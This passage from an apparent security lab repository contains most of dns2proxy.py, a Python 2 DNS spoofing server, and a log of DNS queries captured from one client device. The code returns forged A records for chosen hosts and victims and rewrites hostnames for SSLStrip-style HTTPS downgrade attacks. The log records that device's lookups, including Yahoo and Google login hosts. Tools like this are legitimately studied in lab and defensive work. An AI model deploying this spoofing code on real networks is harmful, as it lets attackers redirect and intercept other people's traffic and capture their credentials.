iph_length + udph_length 289 | #data_size = len(packet) - h_size 290 | #get data from the packet 291 | #data = packet[h_size:] 292 | 293 | 294 | ###################### 295 | # DNS SECTION # 296 | ###################### 297 | 298 | def respuestas(name, type): 299 | global Resolver 300 | 301 | DEBUGLOG('Query = ' + name + ' ' + type) 302 | try: 303 | answers = Resolver.query(name, type) 304 | except Exception, e: 305 | DEBUGLOG('Exception...') 306 | return 0 307 | return answers 308 | 309 | 310 | def requestHandler(address, message): 311 | resp = None 312 | dosleep = False 313 | try: 314 | message_id = ord(message[0]) * 256 + ord(message[1]) 315 | DEBUGLOG('msg id = ' + str(message_id)) 316 | if message_id in serving_ids: 317 | DEBUGLOG('I am already serving this request.') 318 | return 319 | serving_ids.append(message_id) 320 | DEBUGLOG('Client IP: ' + address[0]) 321 | 
prov_ip = address[0] 322 | try: 323 | msg = dns.message.from_wire(message) 324 | try: 325 | op = msg.opcode() 326 | if op == 0: 327 | # standard and inverse query 328 | qs = msg.question 329 | if len(qs) > 0: 330 | q = qs[0] 331 | DEBUGLOG('request is ' + str(q)) 332 | save_req(LOGREQFILE, 'Client IP: ' + address[0] + ' request is ' + str(q) + '\n') 333 | if q.rdtype == dns.rdatatype.A: 334 | DEBUGLOG('Doing the A query....') 335 | resp, dosleep = std_A_qry(msg, prov_ip) 336 | elif q.rdtype == dns.rdatatype.PTR: 337 | #DEBUGLOG('Doing the PTR query....') 338 | resp = std_PTR_qry(msg) 339 | elif q.rdtype == dns.rdatatype.MX: 340 | DEBUGLOG('Doing the MX query....') 341 | resp = std_MX_qry(msg) 342 | elif q.rdtype == dns.rdatatype.TXT: 343 | #DEBUGLOG('Doing the TXT query....') 344 | resp = std_TXT_qry(msg) 345 | elif q.rdtype == dns.rdatatype.AAAA: 346 | #DEBUGLOG('Doing the AAAA query....') 347 | resp = std_AAAA_qry(msg) 348 | else: 349 | # not implemented 350 | resp = make_response(qry=msg, RCODE=4) # RCODE = 4 Not Implemented 351 | else: 352 | # not implemented 353 | resp = make_response(qry=msg, RCODE=4) # RCODE = 4 Not Implemented 354 | 355 | except Exception, e: 356 | DEBUGLOG('got ' + repr(e)) 357 | resp = make_response(qry=msg, RCODE=2) # RCODE = 2 Server Error 358 | DEBUGLOG('resp = ' + repr(resp.to_wire())) 359 | except Exception, e: 360 | DEBUGLOG('got ' + repr(e)) 361 | resp = make_response(id=message_id, RCODE=1) # RCODE = 1 Format Error 362 | DEBUGLOG('resp = ' + repr(resp.to_wire())) 363 | except Exception, e: 364 | # message was crap, not even the ID 365 | DEBUGLOG('got ' + repr(e)) 366 | 367 | if resp: 368 | s.sendto(resp.to_wire(), address) 369 | if dosleep: sleep(1) # Performance downgrade no tested jet 370 | 371 | 372 | def std_PTR_qry(msg): 373 | qs = msg.question 374 | DEBUGLOG( str(len(qs)) + ' questions.') 375 | iparpa = qs[0].to_text().split(' ', 1)[0] 376 | DEBUGLOG('Host: ' + iparpa) 377 | resp = make_response(qry=msg) 378 | hosts = 
respuestas(iparpa[:-1], 'PTR') 379 | if isinstance(hosts, numbers.Integral): 380 | DEBUGLOG('No host....') 381 | resp = make_response(qry=msg, RCODE=3) # RCODE = 3 NXDOMAIN 382 | return resp 383 | 384 | for host in hosts: 385 | DEBUGLOG('Adding ' + host.to_text()) 386 | rrset = dns.rrset.from_text(iparpa, 1000, dns.rdataclass.IN, dns.rdatatype.PTR, host.to_text()) 387 | resp.answer.append(rrset) 388 | 389 | return resp 390 | 391 | 392 | def std_MX_qry(msg): 393 | qs = msg.question 394 | DEBUGLOG(str(len(qs)) + ' questions.') 395 | iparpa = qs[0].to_text().split(' ', 1)[0] 396 | DEBUGLOG('Host: ' + iparpa) 397 | resp = make_response(qry=msg, RCODE=3) # RCODE = 3 NXDOMAIN 398 | return resp 399 | #Temporal disable MX responses 400 | resp = make_response(qry=msg) 401 | hosts = respuestas(iparpa[:-1], 'MX') 402 | if isinstance(hosts, numbers.Integral): 403 | DEBUGLOG('No host....') 404 | resp = make_response(qry=msg, RCODE=3) # RCODE = 3 NXDOMAIN 405 | return resp 406 | 407 | for host in hosts: 408 | DEBUGLOG('Adding ' + host.to_text()) 409 | rrset = dns.rrset.from_text(iparpa, 1000, dns.rdataclass.IN, dns.rdatatype.MX, host.to_text()) 410 | resp.answer.append(rrset) 411 | 412 | return resp 413 | 414 | 415 | def std_TXT_qry(msg): 416 | qs = msg.question 417 | print str(len(qs)) + ' questions.' 418 | iparpa = qs[0].to_text().split(' ', 1)[0] 419 | print 'Host: ' + iparpa 420 | resp = make_response(qry=msg) 421 | 422 | host = iparpa[:-1] 423 | punto = host.find(".") 424 | dominio = host[punto:] 425 | host = "."+host 426 | spfresponse = '' 427 | if (dominio in dominios) or (host in dominios): 428 | ttl = 1 429 | DEBUGLOG('Alert domain! (TXT) ID: ' + host) 430 | # Here the HANDLE! 431 | #os.popen("python /yowsup/yowsup-cli -c /yowsup/config -s \"Host %s\nIP %s\" > /dev/null &"%(id,prov_ip)); 432 | save_req(LOGALERTFILE, 'Alert domain! 
(TXT) ID: ' + host+ '\n') 433 | if host in dominios: spfresponse = "v=spf1 a:mail%s/24 mx -all "%host 434 | if dominio in dominios: spfresponse = "v=spf1 a:mail%s/24 mx -all "%dominio 435 | DEBUGLOG('Responding with SPF = ' + spfresponse) 436 | rrset = dns.rrset.from_text(iparpa, ttl, dns.rdataclass.IN, dns.rdatatype.TXT, spfresponse) 437 | resp.answer.append(rrset) 438 | return resp 439 | 440 | 441 | hosts = respuestas(iparpa[:-1], 'TXT') 442 | if isinstance(hosts, numbers.Integral): 443 | print 'No host....' 444 | resp = make_response(qry=msg, RCODE=3) # RCODE = 3 NXDOMAIN 445 | return resp 446 | 447 | for host in hosts: 448 | print 'Adding ' + host.to_text() 449 | rrset = dns.rrset.from_text(iparpa, 1000, dns.rdataclass.IN, dns.rdatatype.TXT, host.to_text()) 450 | resp.answer.append(rrset) 451 | 452 | return resp 453 | 454 | def std_SPF_qry(msg): 455 | qs = msg.question 456 | print str(len(qs)) + ' questions.' 457 | iparpa = qs[0].to_text().split(' ', 1)[0] 458 | print 'Host: ' + iparpa 459 | resp = make_response(qry=msg) 460 | 461 | # host = iparpa[:-1] 462 | # punto = host.find(".") 463 | # dominio = host[punto:] 464 | # host = "."+host 465 | # if (dominio in dominios) or (host in dominios): 466 | # ttl = 1 467 | # DEBUGLOG('Alert domain! (TXT) ID: ' + host) 468 | # # Here the HANDLE! 469 | # #os.popen("python /yowsup/yowsup-cli -c /yowsup/config -s \"Host %s\nIP %s\" > /dev/null &"%(id,prov_ip)); 470 | # save_req(LOGALERTFILE, 'Alert domain! (TXT) ID: ' + host+ '\n') 471 | # if host in dominios: spfresponse = "v=spf1 a:mail%s/24 mx -all "%host 472 | # if dominio in dominios: spfresponse = "v=spf1 a:mail%s/24 mx -all "%dominio 473 | # DEBUGLOG('Responding with SPF = ' + spfresponse) 474 | # rrset = dns.rrset.from_text(iparpa, ttl, dns.rdataclass.IN, dns.rdatatype.TXT, spfresponse) 475 | # resp.answer.append(rrset) 476 | # return resp 477 | 478 | 479 | hosts = respuestas(iparpa[:-1], 'SPF') 480 | if isinstance(hosts, numbers.Integral): 481 | print 'No host....' 
482 | resp = make_response(qry=msg, RCODE=3) # RCODE = 3 NXDOMAIN 483 | return resp 484 | 485 | for host in hosts: 486 | print 'Adding ' + host.to_text() 487 | rrset = dns.rrset.from_text(iparpa, 1000, dns.rdataclass.IN, dns.rdatatype.SPF, host.to_text()) 488 | resp.answer.append(rrset) 489 | 490 | return resp 491 | 492 | def std_AAAA_qry(msg): 493 | if not Forward: 494 | DEBUGLOG('No host....') 495 | resp = make_response(qry=msg, RCODE=3) # RCODE = 3 NXDOMAIN 496 | return resp 497 | qs = msg.question 498 | DEBUGLOG(str(len(qs)) + ' questions.') 499 | iparpa = qs[0].to_text().split(' ', 1)[0] 500 | DEBUGLOG('Host: ' + iparpa) 501 | resp = make_response(qry=msg) 502 | hosts = respuestas(iparpa[:-1], 'AAAA') 503 | 504 | if isinstance(hosts, numbers.Integral): 505 | DEBUGLOG('No host....') 506 | resp = make_response(qry=msg, RCODE=3) # RCODE = 3 NXDOMAIN 507 | return resp 508 | 509 | for host in hosts: 510 | DEBUGLOG('Adding ' + host.to_text()) 511 | rrset = dns.rrset.from_text(iparpa, 1000, dns.rdataclass.IN, dns.rdatatype.AAAA, host.to_text()) 512 | resp.answer.append(rrset) 513 | 514 | return resp 515 | 516 | def std_A_qry(msg, prov_ip): 517 | global consultas 518 | global ip1 519 | global ip2 520 | global fake_ips 521 | 522 | dosleep = False 523 | qs = msg.question 524 | DEBUGLOG(str(len(qs)) + ' questions.') 525 | resp = make_response(qry=msg) 526 | for q in qs: 527 | qname = q.name.to_text()[:-1] 528 | DEBUGLOG('q name = ' + qname) 529 | 530 | host = qname.lower() 531 | 532 | dom1 = None 533 | dominio = None 534 | 535 | punto1 = host.rfind(".") 536 | punto2 = host.rfind(".",0,punto1-1) 537 | 538 | if punto1 > -1: 539 | dom1 = host[punto1:] 540 | 541 | if punto2 > -1: 542 | dominio = host[punto2:] 543 | 544 | 545 | # punto = host.find(".") 546 | # dominio = host[punto:] 547 | 548 | if (dominio in dominios) or (dom1 in dominios): 549 | ttl = 1 550 | id = host[:punto2] 551 | if dom1 in dominios: 552 | id = host[:punto1] 553 | dominio = dom1 554 | 555 | if not 
id=='www': 556 | DEBUGLOG('Alert domain! ID: ' + id) 557 | # Here the HANDLE! 558 | #os.popen("python /yowsup/yowsup-cli -c /yowsup/config -s \"Host %s\nIP %s\" > /dev/null &"%(id,prov_ip)); 559 | handler_msg(id) 560 | save_req(LOGALERTFILE, 'Alert domain! ID: ' + id + '\n') 561 | DEBUGLOG('Responding with IP = ' + dominios[dominio]) 562 | rrset = dns.rrset.from_text(q.name, ttl, dns.rdataclass.IN, dns.rdatatype.A, dominios[dominio]) 563 | resp.answer.append(rrset) 564 | return resp, dosleep 565 | 566 | if ".%s"%host in dominios: 567 | dominio = ".%s"%host 568 | ttl = 1 569 | DEBUGLOG('Responding with IP = ' + dominios[dominio]) 570 | rrset = dns.rrset.from_text(q.name, ttl, dns.rdataclass.IN, dns.rdatatype.A, dominios[dominio]) 571 | resp.answer.append(rrset) 572 | return resp, dosleep 573 | 574 | ips = respuestas(qname.lower(), 'A') 575 | if qname.lower() not in spoof and isinstance(ips, numbers.Integral): 576 | # SSLSTRIP2 transformation 577 | host2 = '' 578 | for from_host in transformation.keys(): 579 | if host.startswith(from_host): 580 | host2 = transformation[from_host]+host.split(from_host)[1] 581 | break 582 | if host2 != '': 583 | DEBUGLOG('SSLStrip transforming host: %s => %s ...' % (host, host2)) 584 | ips = respuestas(host2, 'A') 585 | 586 | #print '>>> Victim: %s Answer 0: %s'%(prov_ip,prov_resp) 587 | 588 | if isinstance(ips, numbers.Integral): 589 | DEBUGLOG('No host....') 590 | resp = make_response(qry=msg, RCODE=3) # RCODE = 3 NXDOMAIN 591 | return resp, dosleep 592 | 593 | prov_resp = ips[0] 594 | consultas[prov_ip] = prov_resp 595 | 596 | ttl = 1 597 | if (host not in nospoof) and (prov_ip not in nospoofto) and (len(victims) == 0 or prov_ip in victims): 598 | if host in spoof: 599 | save_req(LOGREQFILE, '!!! 
Specific host (' + host + ') asked....\n') 600 | for spoof_ip in spoof[host].split(","): 601 | DEBUGLOG('Adding fake IP = ' + spoof_ip) 602 | rrset = dns.rrset.from_text(q.name, 1000, dns.rdataclass.IN, dns.rdatatype.A, spoof_ip) 603 | resp.answer.append(rrset) 604 | return resp, dosleep 605 | elif Forward: 606 | consultas[prov_ip] = prov_resp 607 | #print 'DEBUG: Adding consultas[%s]=%s'%(prov_ip,prov_resp) 608 | if ip1 is not None: 609 | rrset = dns.rrset.from_text(q.name, ttl, dns.rdataclass.IN, dns.rdatatype.A, ip1) 610 | DEBUGLOG('Adding fake IP = ' + ip1) 611 | resp.answer.append(rrset) 612 | if ip2 is not None: 613 | #Sleep only when using global resquest matrix 614 | dosleep = True 615 | rrset = dns.rrset.from_text(q.name, ttl, dns.rdataclass.IN, dns.rdatatype.A, ip2) 616 | DEBUGLOG('Adding fake IP = ' + ip2) 617 | resp.answer.append(rrset) 618 | if len(fake_ips)>0: 619 | for fip in fake_ips: 620 | rrset = dns.rrset.from_text(q.name, ttl, dns.rdataclass.IN, dns.rdatatype.A, fip) 621 | DEBUGLOG('Adding fake IP = ' + fip) 622 | resp.answer.append(rrset) 623 | 624 | if not Forward and prov_ip not in nospoofto: 625 | if len(fake_ips) == 0: 626 | DEBUGLOG('No forwarding....') 627 | resp = make_response(qry=msg, RCODE=3) # RCODE = 3 NXDOMAIN 628 | elif len(fake_ips) > 0: 629 | DEBUGLOG('No forwarding (but adding fake IPs)...') 630 | for fip in fake_ips: 631 | rrset = dns.rrset.from_text(q.name, ttl, dns.rdataclass.IN, dns.rdatatype.A, fip) 632 | DEBUGLOG('Adding fake IP = ' + fip) 633 | resp.answer.append(rrset) 634 | return resp, dosleep 635 | 636 | for realip in ips: 637 | DEBUGLOG('Adding real IP = ' + realip.to_text()) 638 | rrset = dns.rrset.from_text(q.name, ttl, dns.rdataclass.IN, dns.rdatatype.A, realip.to_text()) 639 | resp.answer.append(rrset) 640 | 641 | return resp, dosleep 642 | 643 | 644 | # def std_A2_qry(msg): 645 | # qs = msg.question 646 | # DEBUGLOG(str(len(qs)) + ' questions.') 647 | # iparpa = qs[0].to_text().split(' ',1)[0] 648 | # print 
'Host: '+ iparpa 649 | # resp = make_response(qry=msg) 650 | # rrset = dns.rrset.from_text(iparpa, 1000,dns.rdataclass.IN, dns.rdatatype.A, '4.4.45.4') 651 | # resp.answer.append(rrset) 652 | # return resp 653 | 654 | def std_ASPOOF_qry(msg): 655 | global spoof 656 | qs = msg.question 657 | DEBUGLOG(str(len(qs)) + ' questions.') 658 | iparpa = qs[0].to_text().split(' ', 1)[0] 659 | DEBUGLOG('Host: ' + iparpa) 660 | resp = make_response(qry=msg) 661 | 662 | for q in qs: 663 | qname = q.name.to_text()[:-1] 664 | DEBUGLOG('q name = ' + qname) + ' to resolve ' + spoof[qname] 665 | # rrset = dns.rrset.from_text(iparpa, 1000,dns.rdataclass.IN, dns.rdatatype.CNAME, 'www.facebook.com.') 666 | # resp.answer.append(rrset) 667 | # rrset = dns.rrset.from_text(iparpa, 1000,dns.rdataclass.IN, dns.rdatatype.CNAME, 'www.yahoo.com.') 668 | # resp.answer.append(rrset) 669 | # rrset = dns.rrset.from_text(iparpa, 1000,dns.rdataclass.IN, dns.rdatatype.CNAME, 'www.tuenti.com.') 670 | # resp.answer.append(rrset) 671 | # rrset = dns.rrset.from_text(iparpa, 1000,dns.rdataclass.IN, dns.rdatatype.CNAME, 'www.twitter.com.') 672 | # resp.answer.append(rrset) 673 | rrset = dns.rrset.from_text(q.name, 1000, dns.rdataclass.IN, dns.rdatatype.A, spoof[qname]) 674 | resp.answer.append(rrset) 675 | return resp 676 | 677 | 678 | def make_response(qry=None, id=None, RCODE=0): 679 | if qry is None and id is None: 680 | raise Exception, 'bad use of make_response' 681 | if qry is None: 682 | resp = dns.message.Message(id) 683 | # QR = 1 684 | resp.flags |= dns.flags.QR 685 | if RCODE != 1: 686 | raise Exception, 'bad use of make_response' 687 | else: 688 | resp = dns.message.make_response(qry) 689 | resp.flags |= dns.flags.AA 690 | resp.flags |= dns.flags.RA 691 | resp.set_rcode(RCODE) 692 | return resp 693 | 694 | def parse_args(): 695 | 696 | parser = argparse.ArgumentParser() 697 | 698 | parser.add_argument("-N", "--noforward", 699 | help="DNS Fowarding OFF (default ON)", 700 | action="store_true") 701 
| 702 | parser.add_argument("-i", "--interface", 703 | help="Interface to use", 704 | default="eth0") 705 | parser.add_argument("-u", "--ip1", 706 | help="First IP to add at the response", 707 | default=None) 708 | 709 | parser.add_argument("-d", "--ip2", 710 | help="Second IP to add at the response", 711 | default=None) 712 | 713 | parser.add_argument("-I", "--ips", 714 | nargs='*', 715 | help="List of IPs to add after ip1,ip2 separated with commas", 716 | default=[]) 717 | 718 | parser.add_argument("-S", "--silent", 719 | help="Silent mode", 720 | action="store_true") 721 | 722 | parser.add_argument("-A", "--adminIP", 723 | help="Administrator IP for no filtering", 724 | default="192.168.0.1") 725 | 726 | args = parser.parse_args() 727 | 728 | return args 729 | 730 | def run(interface=None, 731 | noforward=None, 732 | arg_ip1=None, 733 | arg_ip2=None, 734 | arg_ips=[], 735 | silent=False, 736 | adminIP=None): 737 | 738 | global debug 739 | global dev 740 | global adminip 741 | global ip1 742 | global ip2 743 | global ip3 744 | global Resolver 745 | global s 746 | global serving_ids 747 | global noserv 748 | global sniff 749 | global fake_ips 750 | global Forward 751 | 752 | debug = not silent 753 | dev = interface 754 | adminip = adminIP 755 | ip1 = arg_ip1 756 | ip2 = arg_ip2 757 | Forward = not noforward 758 | 759 | fake_ips = [] 760 | for ip in arg_ips: 761 | fake_ips.append(ip) 762 | 763 | Resolver = dns.resolver.Resolver() 764 | 765 | process_files() 766 | 767 | Resolver.reset() 768 | Resolver.read_resolv_conf(RESOLVCONF) 769 | 770 | signal.signal(signal.SIGUSR1, SIGUSR1_handle) 771 | 772 | s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) 773 | s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) 774 | s.bind(('', 53)) 775 | 776 | if Forward: 777 | DEBUGLOG('DNS Forwarding activado....') 778 | else: 779 | DEBUGLOG('DNS Forwarding desactivado....') 780 | 781 | DEBUGLOG('binded to UDP port 53.') 782 | serving_ids = [] 783 | noserv = True 784 | 785 | if 
ip1 is not None and ip2 is not None and Forward: 786 | sniff = ThreadSniffer() 787 | sniff.start() 788 | 789 | while True: 790 | if noserv: 791 | DEBUGLOG('waiting requests.') 792 | 793 | try: 794 | message, address = s.recvfrom(1024) 795 | noserv = True 796 | except socket.error as (code, msg): 797 | if code != errno.EINTR: 798 | raise 799 | 800 | if noserv: 801 | DEBUGLOG('serving a request.') 802 | requestHandler(address, message) 803 | 804 | if __name__ == '__main__': 805 | 806 | args = parse_args() 807 | 808 | run(args.interface, 809 | noforward=args.noforward, 810 | arg_ip1=args.ip1, 811 | arg_ip2=args.ip2, 812 | arg_ips=args.ips, 813 | silent=args.silent, 814 | adminIP=args.adminIP) 815 | -------------------------------------------------------------------------------- /lab4/dns2proxy/dnsalert.txt: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /lab4/dns2proxy/dnslog.txt: -------------------------------------------------------------------------------- 1 | 2 | 2017-06-27 01:45:27 Client IP: 10.0.0.98 request is connectivitycheck.gstatic.com. IN A 3 | 2017-06-27 01:45:27 Client IP: 10.0.0.98 request is connectivitycheck.gstatic.com. IN A 4 | 2017-06-27 01:45:27 Client IP: 10.0.0.98 request is mqtt-mini.facebook.com. IN A 5 | 2017-06-27 01:45:28 Client IP: 10.0.0.98 request is epdg.epc.att.net. IN A 6 | 2017-06-27 01:45:28 Client IP: 10.0.0.98 request is edge-mqtt.facebook.com. IN A 7 | 2017-06-27 01:45:28 Client IP: 10.0.0.98 request is mtalk.google.com. IN A 8 | 2017-06-27 01:45:28 Client IP: 10.0.0.98 request is play.googleapis.com. IN A 9 | 2017-06-27 01:45:29 Client IP: 10.0.0.98 request is service.game-mode.net. IN A 10 | 2017-06-27 01:45:29 Client IP: 10.0.0.98 request is graph.facebook.com. IN A 11 | 2017-06-27 01:45:30 Client IP: 10.0.0.98 request is 44condev.files.wordpress.com. 
IN A 12 | 2017-06-27 01:45:30 Client IP: 10.0.0.98 request is fonts.googleapis.com. IN A 13 | 2017-06-27 01:45:30 Client IP: 10.0.0.98 request is 44con.com. IN A 14 | 2017-06-27 01:45:30 Client IP: 10.0.0.98 request is translate.googleapis.com. IN A 15 | 2017-06-27 01:45:30 Client IP: 10.0.0.98 request is accounts.google.com. IN A 16 | 2017-06-27 01:45:30 Client IP: 10.0.0.98 request is platform.twitter.com. IN A 17 | 2017-06-27 01:45:30 Client IP: 10.0.0.98 request is r-login.wordpress.com. IN A 18 | 2017-06-27 01:45:30 Client IP: 10.0.0.98 request is s1.wp.com. IN A 19 | 2017-06-27 01:45:30 Client IP: 10.0.0.98 request is s0.wp.com. IN A 20 | 2017-06-27 01:45:30 Client IP: 10.0.0.98 request is s2.wp.com. IN A 21 | 2017-06-27 01:45:30 Client IP: 10.0.0.98 request is android.clients.google.com. IN A 22 | 2017-06-27 01:45:30 Client IP: 10.0.0.98 request is stats.wp.com. IN A 23 | 2017-06-27 01:45:30 Client IP: 10.0.0.98 request is www.youtube.com. IN A 24 | 2017-06-27 01:45:31 Client IP: 10.0.0.98 request is connectivitycheck.gstatic.com. IN A 25 | 2017-06-27 01:45:31 Client IP: 10.0.0.98 request is connectivitycheck.gstatic.com. IN A 26 | 2017-06-27 01:45:34 Client IP: 10.0.0.98 request is hackru.org. IN A 27 | 2017-06-27 01:45:34 Client IP: 10.0.0.98 request is webuse.fontawesome.com. IN A 28 | 2017-06-27 01:45:34 Client IP: 10.0.0.98 request is webs3.amazonaws.com. IN A 29 | 2017-06-27 01:45:35 Client IP: 10.0.0.98 request is hackru.org. IN A 30 | 2017-06-27 01:45:35 Client IP: 10.0.0.98 request is www.google.com. IN A 31 | 2017-06-27 01:45:35 Client IP: 10.0.0.98 request is www.google.com. IN A 32 | 2017-06-27 01:45:36 Client IP: 10.0.0.98 request is hackru.org. IN A 33 | 2017-06-27 01:45:36 Client IP: 10.0.0.98 request is web. IN A 34 | 2017-06-27 01:45:36 Client IP: 10.0.0.98 request is wwww.google.com. IN A 35 | 2017-06-27 01:45:37 Client IP: 10.0.0.98 request is clients1.google.com. 
IN A 36 | 2017-06-27 01:45:37 Client IP: 10.0.0.98 request is jofieahbxrxeye. IN A 37 | 2017-06-27 01:45:37 Client IP: 10.0.0.98 request is qjuoeqx. IN A 38 | 2017-06-27 01:45:37 Client IP: 10.0.0.98 request is ewfofkvzbrtv. IN A 39 | 2017-06-27 01:45:38 Client IP: 10.0.0.98 request is mqtt-mini.facebook.com. IN A 40 | 2017-06-27 01:45:38 Client IP: 10.0.0.98 request is portal.fb.com. IN A 41 | 2017-06-27 01:45:39 Client IP: 10.0.0.98 request is webmy.mlh.io. IN A 42 | 2017-06-27 01:45:47 Client IP: 10.0.0.98 request is android.clients.google.com. IN A 43 | 2017-06-27 01:45:47 Client IP: 10.0.0.98 request is android.clients.google.com. IN A 44 | 2017-06-27 01:47:50 Client IP: 10.0.0.98 request is mqtt-mini.facebook.com. IN A 45 | 2017-06-27 01:47:50 Client IP: 10.0.0.98 request is epdg.epc.att.net. IN A 46 | 2017-06-27 01:47:50 Client IP: 10.0.0.98 request is edge-mqtt.facebook.com. IN A 47 | 2017-06-27 01:47:51 Client IP: 10.0.0.98 request is mtalk.google.com. IN A 48 | 2017-06-27 01:47:54 Client IP: 10.0.0.98 request is connectivitycheck.gstatic.com. IN A 49 | 2017-06-27 01:47:54 Client IP: 10.0.0.98 request is connectivitycheck.gstatic.com. IN A 50 | 2017-06-27 01:47:54 Client IP: 10.0.0.98 request is use.fontawesome.com. IN A 51 | 2017-06-27 01:47:54 Client IP: 10.0.0.98 request is webuse.fontawesome.com. IN A 52 | 2017-06-27 01:47:55 Client IP: 10.0.0.98 request is web. IN A 53 | 2017-06-27 01:47:55 Client IP: 10.0.0.98 request is s3.amazonaws.com. IN A 54 | 2017-06-27 01:47:55 Client IP: 10.0.0.98 request is hackru.org. IN A 55 | 2017-06-27 01:47:55 Client IP: 10.0.0.98 request is webs3.amazonaws.com. IN A 56 | 2017-06-27 01:47:55 Client IP: 10.0.0.98 request is www.google.com. IN A 57 | 2017-06-27 01:47:55 Client IP: 10.0.0.98 request is wwww.google.com. IN A 58 | 2017-06-27 01:47:55 Client IP: 10.0.0.98 request is android.clients.google.com. IN A 59 | 2017-06-27 01:47:55 Client IP: 10.0.0.98 request is hackru.org. 
IN A 60 | 2017-06-27 01:48:00 Client IP: 10.0.0.98 request is mqtt-mini.facebook.com. IN A 61 | 2017-06-27 01:48:00 Client IP: 10.0.0.98 request is webmy.mlh.io. IN A 62 | 2017-06-27 01:48:00 Client IP: 10.0.0.98 request is portal.fb.com. IN A 63 | 2017-06-27 01:48:01 Client IP: 10.0.0.98 request is static.mlh.io. IN A 64 | 2017-06-27 01:48:01 Client IP: 10.0.0.98 request is webmlh.io. IN A 65 | 2017-06-27 01:48:02 Client IP: 10.0.0.98 request is webfonts.googleapis.com. IN A 66 | 2017-06-27 01:48:03 Client IP: 10.0.0.98 request is webconnect.facebook.net. IN A 67 | 2017-06-27 01:48:03 Client IP: 10.0.0.98 request is clients1.google.com. IN A 68 | 2017-06-27 01:48:03 Client IP: 10.0.0.98 request is www.google-analytics.com. IN A 69 | 2017-06-27 01:48:03 Client IP: 10.0.0.98 request is social.facebook.com. IN A 70 | 2017-06-27 01:48:11 Client IP: 10.0.0.98 request is mqtt-mini.facebook.com. IN A 71 | 2017-06-27 01:48:25 Client IP: 10.0.0.98 request is mqtt-mini.facebook.com. IN A 72 | 2017-06-27 01:48:36 Client IP: 10.0.0.98 request is edge-mqtt.facebook.com. IN A 73 | 2017-06-27 01:48:37 Client IP: 10.0.0.98 request is webmy.mlh.io. IN A 74 | 2017-06-27 01:48:43 Client IP: 10.0.0.98 request is webmy.mlh.io. IN A 75 | 2017-06-27 01:48:46 Client IP: 10.0.0.98 request is edge-mqtt.facebook.com. IN A 76 | 2017-06-27 01:48:47 Client IP: 10.0.0.98 request is webmy.mlh.io. IN A 77 | 2017-06-27 01:48:48 Client IP: 10.0.0.98 request is settings.crashlytics.com. IN A 78 | 2017-06-27 01:48:53 Client IP: 10.0.0.98 request is webmy.mlh.io. IN A 79 | 2017-06-27 01:54:08 Client IP: 10.0.0.98 request is connectivitycheck.gstatic.com. IN A 80 | 2017-06-27 01:54:08 Client IP: 10.0.0.98 request is connectivitycheck.gstatic.com. IN A 81 | 2017-06-27 01:54:09 Client IP: 10.0.0.98 request is edge-mqtt.facebook.com. IN A 82 | 2017-06-27 01:54:09 Client IP: 10.0.0.98 request is mqtt-mini.facebook.com. IN A 83 | 2017-06-27 01:54:09 Client IP: 10.0.0.98 request is epdg.epc.att.net. 
IN A 84 | 2017-06-27 01:54:11 Client IP: 10.0.0.98 request is mtalk.google.com. IN A 85 | 2017-06-27 01:54:14 Client IP: 10.0.0.98 request is mtalk.google.com. IN A 86 | 2017-06-27 01:54:14 Client IP: 10.0.0.98 request is android.clients.google.com. IN A 87 | 2017-06-27 01:54:19 Client IP: 10.0.0.98 request is mqtt-mini.facebook.com. IN A 88 | 2017-06-27 01:54:20 Client IP: 10.0.0.98 request is googleads.g.doubleclick.net. IN A 89 | 2017-06-27 01:54:20 Client IP: 10.0.0.98 request is portal.fb.com. IN A 90 | 2017-06-27 01:54:34 Client IP: 10.0.0.98 request is mqtt-mini.facebook.com. IN A 91 | 2017-06-27 01:55:09 Client IP: 10.0.0.98 request is android.clients.google.com. IN A 92 | 2017-06-27 01:55:09 Client IP: 10.0.0.98 request is android.clients.google.com. IN A 93 | 2017-06-27 01:55:11 Client IP: 10.0.0.98 request is graph.facebook.com. IN A 94 | 2017-06-27 01:55:11 Client IP: 10.0.0.98 request is samizdat.nytimes.com. IN A 95 | 2017-06-27 01:55:19 Client IP: 10.0.0.98 request is android.clients.google.com. IN A 96 | 2017-06-27 01:55:20 Client IP: 10.0.0.98 request is android.clients.google.com. IN A 97 | 2017-06-27 01:55:21 Client IP: 10.0.0.98 request is graph.facebook.com. IN A 98 | 2017-06-27 01:55:21 Client IP: 10.0.0.98 request is samizdat.nytimes.com. IN A 99 | 2017-06-27 01:55:40 Client IP: 10.0.0.98 request is mqtt-mini.facebook.com. IN A 100 | 2017-06-27 01:59:29 Client IP: 10.0.0.98 request is connectivitycheck.gstatic.com. IN A 101 | 2017-06-27 01:59:29 Client IP: 10.0.0.98 request is connectivitycheck.gstatic.com. IN A 102 | 2017-06-27 01:59:29 Client IP: 10.0.0.98 request is epdg.epc.att.net. IN A 103 | 2017-06-27 01:59:29 Client IP: 10.0.0.98 request is mqtt-mini.facebook.com. IN A 104 | 2017-06-27 01:59:29 Client IP: 10.0.0.98 request is edge-mqtt.facebook.com. IN A 105 | 2017-06-27 01:59:33 Client IP: 10.0.0.98 request is mtalk.google.com. IN A 106 | 2017-06-27 01:59:35 Client IP: 10.0.0.98 request is android.clients.google.com. 
IN A 107 | 2017-06-27 01:59:38 Client IP: 10.0.0.98 request is android.clients.google.com. IN A 108 | 2017-06-27 01:59:40 Client IP: 10.0.0.98 request is portal.fb.com. IN A 109 | 2017-06-27 01:59:41 Client IP: 10.0.0.98 request is android.clients.google.com. IN A 110 | 2017-06-27 01:59:45 Client IP: 10.0.0.98 request is android.clients.google.com. IN A 111 | 2017-06-27 01:59:48 Client IP: 10.0.0.98 request is login.yahoo.com. IN A 112 | 2017-06-27 01:59:48 Client IP: 10.0.0.98 request is s.yimg.com. IN A 113 | 2017-06-27 01:59:48 Client IP: 10.0.0.98 request is s1.yimg.com. IN A 114 | 2017-06-27 01:59:48 Client IP: 10.0.0.98 request is sb.scorecardresearch.com. IN A 115 | 2017-06-27 01:59:48 Client IP: 10.0.0.98 request is geo.query.yahoo.com. IN A 116 | 2017-06-27 01:59:48 Client IP: 10.0.0.98 request is google.com. IN A 117 | 2017-06-27 01:59:48 Client IP: 10.0.0.98 request is geo.yahoo.com. IN A 118 | 2017-06-27 01:59:49 Client IP: 10.0.0.98 request is gstatic.com. IN A 119 | 2017-06-27 01:59:49 Client IP: 10.0.0.98 request is ucs.query.yahoo.com. IN A 120 | 2017-06-27 01:59:49 Client IP: 10.0.0.98 request is y.analytics.yahoo.com. IN A 121 | 2017-06-27 